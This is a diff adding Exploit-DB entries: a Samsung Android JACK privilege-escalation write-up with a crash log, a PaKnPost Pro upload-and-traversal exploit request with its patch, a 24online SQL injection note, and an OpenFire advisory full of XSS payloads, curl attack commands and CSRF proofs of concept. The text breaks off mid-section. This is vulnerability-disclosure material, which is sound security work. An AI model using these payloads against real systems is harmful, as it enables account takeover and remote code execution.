diff --git a/files.csv b/files.csv index 98d044d50..3fb94f661 100755 --- a/files.csv +++ b/files.csv @@ -36058,6 +36058,7 @@ id,file,description,date,author,platform,type,port 39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80 +40059,platforms/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",php,webapps,80 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0 39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 @@ -36229,3 +36230,11 @@ id,file,description,date,author,platform,type,port 40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0 40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80 40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80 +40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80 +40061,platforms/lin_x86-64/shellcode/40061.c,"Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes",2016-07-06,CripSlick,lin_x86-64,shellcode,0 +40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80 +40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80 +40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0 +40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80 +40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0 +40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80 diff --git a/platforms/android/local/40066.txt b/platforms/android/local/40066.txt new file mode 100755 index 000000000..09bfab40b --- /dev/null +++ b/platforms/android/local/40066.txt @@ -0,0 +1,230 @@ +Sources: +https://bugs.chromium.org/p/project-zero/issues/detail?id=796 +https://bugs.chromium.org/p/project-zero/issues/detail?id=795 + +The usermode audio subsystem for the "Samsung Android Professional Audio" is +based on JACK, which appears to be designed for single-user usage. The common +JACK configuration on Linux systems appears to be a JACK server running under +the current user account, and interacting with JACK clients from the same user +account; so with a minimal privilege difference; this is not the case with the +configuration on Android, where the JACK service runs as a more privileged user +in a less restrictive SELinux domain to the clients that can connect to it. + +The shared memory implementation (implemented by com.samsung.android.IAndroidShm +system service) allows any application to access/modify/map shared memory pages +used by JACK, regardless of which application created those shared memory pages. + +(NB: This possibly results in breaking the Android permissions model and +permitting applications without the required capability to access microphone +input; this was not investigated further.) + +There are multiple possible ways to corrupt the internal state of any of the +shared-memory backed c++ objects in use; attached is a PoC that uses the shared +memory service to map the JackEngineControl object in use, and modify the value +of the fDriverNum member, which is used in several places without validation. + +This is highly likely not the only variable stored in shared memory that is used +without proper validation; and the function shown below is definitely not the +only place that this particular variable is used dangerously. To secure this +interface it will be necessary to review all uses of variables stored in these +shared memory interfaces. + +/*! +\brief Engine control in shared memory. +*/ + +PRE_PACKED_STRUCTURE +struct SERVER_EXPORT JackEngineControl : public JackShmMem +{ + // Shared state + jack_nframes_t fBufferSize; + jack_nframes_t fSampleRate; + bool fSyncMode; + bool fTemporary; + jack_time_t fPeriodUsecs; + jack_time_t fTimeOutUsecs; + float fMaxDelayedUsecs; + float fXrunDelayedUsecs; + bool fTimeOut; + bool fRealTime; + bool fSavedRealTime; // RT state saved and restored during Freewheel mode + int fServerPriority; + int fClientPriority; + int fMaxClientPriority; + char fServerName[JACK_SERVER_NAME_SIZE+1]; + JackTransportEngine fTransport; + jack_timer_type_t fClockSource; + int fDriverNum; + bool fVerbose; + + // CPU Load + jack_time_t fPrevCycleTime; + jack_time_t fCurCycleTime; + jack_time_t fSpareUsecs; + jack_time_t fMaxUsecs; + jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT]; + unsigned int fRollingClientUsecsCnt; + int fRollingClientUsecsIndex; + int fRollingInterval; + float fCPULoad; + + // For OSX thread + UInt64 fPeriod; + UInt64 fComputation; + UInt64 fConstraint; + + // Timer + JackFrameTimer fFrameTimer; + +#ifdef JACK_MONITOR + JackEngineProfiling fProfiler; +#endif + + ... + +This is quite a convenient exploitation primitive, as a small negative value +will cause the code in several places to index backwards from a known array; +when (any of the similar functions to the below are called, table is pointing +to the fClientTable array inside a JackEngine instance) + +void JackTransportEngine::MakeAllLocating(JackClientInterface** table) +{ + for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) { + JackClientInterface* client = table[i]; + if (client) { + JackClientControl* control = client->GetClientControl(); + control->fTransportState = JackTransportStopped; + control->fTransportSync = true; + control->fTransportTimebase = true; + jack_log("MakeAllLocating ref = %ld", i); + } + } +} + +class SERVER_EXPORT JackEngine : public JackLockAble +{ + friend class JackLockedEngine; + + private: + + JackGraphManager* fGraphManager; + JackEngineControl* fEngineControl; + char fSelfConnectMode; + JackClientInterface* fClientTable[CLIENT_NUM]; + +We can see that just behind the fClientTable, we have two pointers to other +objects; a JackEngineControl and a JackGraphManager, both of which are backed by +shared memory. Since we are treating the pointer read from table as a c++ object +with a vtable pointer, this lets us trivially gain control of the flow of +execution. + + Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd) + *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** + Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys' + Revision: '10' + ABI: 'arm' + pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<< + AM write failed: Broken pipe + signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140 + r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141 + r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078 + r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991 + ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030 + + backtrace: + #00 pc 41414140 + #01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52) + #02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228) + #03 pc 00048bd5 /system/lib/libjackserver.so + #04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228) + #05 pc 000442fd /system/lib/libjackserver.so + #06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40) + #07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20) + #08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94) + #09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22) + #10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24) + #11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18) + #12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126) + #13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30) + #14 pc 0001a38b /system/lib/libc.so (__start_thread+6) + + Tombstone written to: /data/tombstones/tombstone_05 + +################################################################################################################ + +The usermode audio subsystem for the "Samsung Android Professional Audio" is +based on JACK, which appears to be designed for single-user usage. The common +JACK configuration on Linux systems appears to be a JACK server running under +the current user account, and interacting with JACK clients from the same user +account; so with a minimal privilege difference; this is not the case with the +configuration on Android, where the JACK service runs as a more privileged user +in a less restrictive SELinux domain to the clients that can connect to it. + +The JACK shared memory implementation uses the struct jack_shm_info_t defined in +/common/shm.h to do some bookkeeping + +PRE_PACKED_STRUCTURE +struct _jack_shm_info { + jack_shm_registry_index_t index; /* offset into the registry */ + uint32_t size; +#ifdef __ANDROID__ + jack_shm_fd_t fd; +#endif + union { + void *attached_at; /* address where attached */ + char ptr_size[8]; + } ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */ +} POST_PACKED_STRUCTURE; + +typedef struct _jack_shm_info jack_shm_info_t; + +This struct is stored at the start of every JackShmAble object. + +/*! +\brief +A class which objects possibly want to be allocated in shared memory derives from this class. +*/ + +class JackShmMemAble +{ + protected: + + jack_shm_info_t fInfo; + + public: + + void Init(); + + int GetShmIndex() + { + return fInfo.index; + } + + char* GetShmAddress() + { + return (char*)fInfo.ptr.attached_at; + } + + void LockMemory() + { + LockMemoryImp(this, fInfo.size); + } + + void UnlockMemory() + { + UnlockMemoryImp(this, fInfo.size); + } + +}; + +This means that whenever the JACK server creates an object backed by shared +memory, it also stores a pointer to that object (in the address space of the +JACK server), allowing a malicious client to bypass ASLR in the JACK server +process. + +The PoC provided for the other reported JACK issue uses this to bypass ASLR in +the JACK server process. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip diff --git a/platforms/cgi/webapps/40063.txt b/platforms/cgi/webapps/40063.txt new file mode 100755 index 000000000..c0583e22c --- /dev/null +++ b/platforms/cgi/webapps/40063.txt @@ -0,0 +1,91 @@ +# Exploit Title: PaKnPost Pro Arbitrary File Upload & Remote Code Execution +# Date: 2016-07-06 +# Product: PaKnPost Pro +# Vendor Homepage: http://www.paknpost.org +# Software Link: https://sourceforge.net/projects/paknpost/ +# Version: <=1.14 +# Tested on: Windows, Linux +# Exploit Authors: Edvin Rustemagic, Grega Preseren +# Contacts: https://www.linkedin.com/in/edvinrustemagic - https://si.linkedin.com/in/gregapreseren + +=========== +Description +=========== +File extension check bypass and directory traversal lead to uploading an arbitrary file to an unintended directory and remote code execution. + +======= +Details +======= +File extension check can be bypassed by using two extensions, out of which one must be allowed (select_.cgi:368). +Directory traversal vulnerability exists in the GET parameter sid, where no validation checks are made (select_.cgi:204). +Exploitation of these two vulnerabilities allows an attacker to upload a webshell to an executable directory and gain command line access to the server. Windows deployments turned out to be more likely exploitable with a consequence of gaining SYSTEM privileges. + +======== +Timeline +======== +2016-03-15 Vulnerability discovered at customer's deployment. +2016-06-13 PoC completed for Linux and Windows platforms. +2016-06-13 Author/Maintainer at SourceForge has been notified. +2016-06-21 Patch written and delivered to Author/Maintainer. +2016-06-23 Patch publicly released. +2016-07-06 Exploit submitted to Exploit-DB. + +======================= +Windows PoC Environment +======================= +- Windows Server 2003 R2 SP2 +- Apache 2.2.10 +- ActivePerl 5.8.0.806 + +===================== +Linux PoC Environment +===================== +- Debian 8.3 +- Apache 2.4.10 +- Perl 5.20.2 + +======= +Exploit +======= +1. File upload GET parameter 'sid' can be exploited in order to upload an arbitrary file to an unintended executable directory. +2. File upload multipart POST parameter 'filename' can include two extensions to bypass file extension check. +For example: +POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1 +Host: paknpost +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://paknpost/cgi-bin/pnp/select.cgi +Connection: close +Content-Type: multipart/form-data; boundary=---------------------------6077763223847 +Content-Length: 6087 + +-----------------------------6077763223847 +Content-Disposition: form-data; name="file[1]"; filename="pnp-test.txt.cgi" +Content-Type: application/octet-stream + +============== +Solution/Patch +============== +a. Update to version 1.15 +b. Or apply the following patch: +--- select_.cgi.ORIG 2016-03-29 22:56:40.868000000 +0200 ++++ select_.cgi 2016-06-14 10:18:37.864000000 +0200 +@@ -201,6 +201,9 @@ + } + + # Create the new Holding Area ++if ($sessionid =~ m/[^\w]/) { ++ &error(file_write); ++} + $user_dir = $upload_dir.$sessionid; + if (-d "$user_dir") + { +@@ -365,7 +368,7 @@ + if ($file_check) + { + # Exclude all except acceptable file extensions as a fist cut to file checks +- unless (grep($fhl =~ /$_/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; } ++ unless (grep($fhl =~ /$_$/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; } + $debug1 = "Passed"; \ No newline at end of file diff --git a/platforms/jsp/webapps/40060.txt b/platforms/jsp/webapps/40060.txt new file mode 100755 index 000000000..01a022eba --- /dev/null +++ b/platforms/jsp/webapps/40060.txt @@ -0,0 +1,22 @@ +# Exploit Title: SQL Injection In 24 Online Billing API +# Date: 03/07/2016 +# Exploit Author: Rahul Raz +# Vendor Homepage: http://24onlinebilling.com +# Software Name:24online Model SMS_2500i +# Version: 8.3.6 build 9.0 +# Tested on: Ubuntu Linux + +Potentially others versions older than this are vulnerable too. + +Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') + +The invoiceid GET parameter on /24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection + +Authentication Required: Yes + +A non-privileged authenticated user can inject SQL commands on the /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid= &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss + +There is complete informational disclosure over the stored database. + + +I tried to contact them to disclose and get the vulnerability patched, but they did not reply positively. diff --git a/platforms/jsp/webapps/40065.txt b/platforms/jsp/webapps/40065.txt new file mode 100755 index 000000000..29d08a7cf --- /dev/null +++ b/platforms/jsp/webapps/40065.txt @@ -0,0 +1,681 @@ +# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1 + + +## Product Description + +**OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community. +The actual version of the product is 4.0.2. + +Official web site : http://igniterealtime.org/ + +Several vulnerabilities have been discovered between 2015, October and 2016, February. +Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages. + +In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over. + +**Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document). + + +## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.2 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user. + +### Proof of Concept + +#### *domain* and *remotePort* variables from *server2server-settings.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server +``` + +or + +``` +domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server +``` + +or + +``` + +domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server +``` + +You can reproduce the exploitation with the following curl commands: + +``` +curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" + +curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" + +curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" +``` + +#### *criteria* variable from *plugins/search/advance-user-search.jsp* + +The following GET request exploits the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search +``` + + +## Several stored XSS Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.5 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user. + +### Proof of Concept + +#### *mucdesc* variable from *muc-service-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + +
+ + +``` + +or with this curl command: + +``` +curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX" +``` + +#### *searchname* variable from *plugins/search/search-props-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + +
+ + +``` + +or with this curl command: + +``` +curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX" +``` + + +#### *searchname* variable from *page plugins/search/search-props-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + + +
+ + +``` + +or with this curl command: + +``` +curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX" +``` + +#### *serverName* variable from *plugins/search/search-props-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + + + + + + + + + + +
+ + +``` + +or with this curl command: + +``` +curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX" +``` + +### Affected versions + +* Version >= 3.10.2 and < 4.0.0 + + +## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.2 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator. + +Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly. + +### Proof of Concept + +#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability + +The following POST values can be sent to trigger the vulnerability: + +``` +groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat +``` + +The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page: + +``` +curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX" +``` + +#### *search* variable from *group-summary.jsp* + +The following GET request exploit the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 +``` + +The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page. + +``` +curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX" +``` + + +#### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp* + +The following GET request exploit the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings +``` + +The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page: + +``` +curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX" +``` + +#### *passPhrase* variables from *import-keystore-certificate.jsp* + +The following POST values exploit the XSS vulnerability: + +``` +passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save +``` + +The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page. + +``` +curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX" +``` + +#### *criteria* variable from */plugins/search/advance-user-search.jsp* + +The following GET request exploit the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search +``` + +The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page. + +``` +curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX" +``` + +### Affected versions + +* Version 4.0.0 and 4.0.1 + +## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1 + +Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since. + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.5 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user. + +### Proof of Concept + +#### *subdomain* variable from *connection-settings-external-components.jsp* + +The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page: + +``` +curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX" +``` + +Or + +``` +curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX" +``` + +#### *mucdesc* variable from *muc-service-edit-form.jsp* + +The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page: + +``` +curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX" +``` + +#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp + +The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page: + +``` +curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX" +``` + +#### *searchname* variable from *plugins/search/search-props-edit-form.jsp* + +The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page: + +``` +curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX" +``` + +The folling code allows exploiting the vulnerability: + +``` + +
+ + + +
+ + +``` + +#### *propValue* variable from *server-properties.jsp* + +The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page: + +``` +curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX" +``` + +The folling code allows exploiting the vulnerability: + +``` + +
+ + + + +
+ + +``` + + +###Affected versions + +* Version 4.0.0 and 4.0.1 + + +## Several CSRF Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-312 + +**CVSS Base Score**: 5.4 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever. + + +### Proof of Concept + +#### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page: + +``` + +
+ + + + + + + +
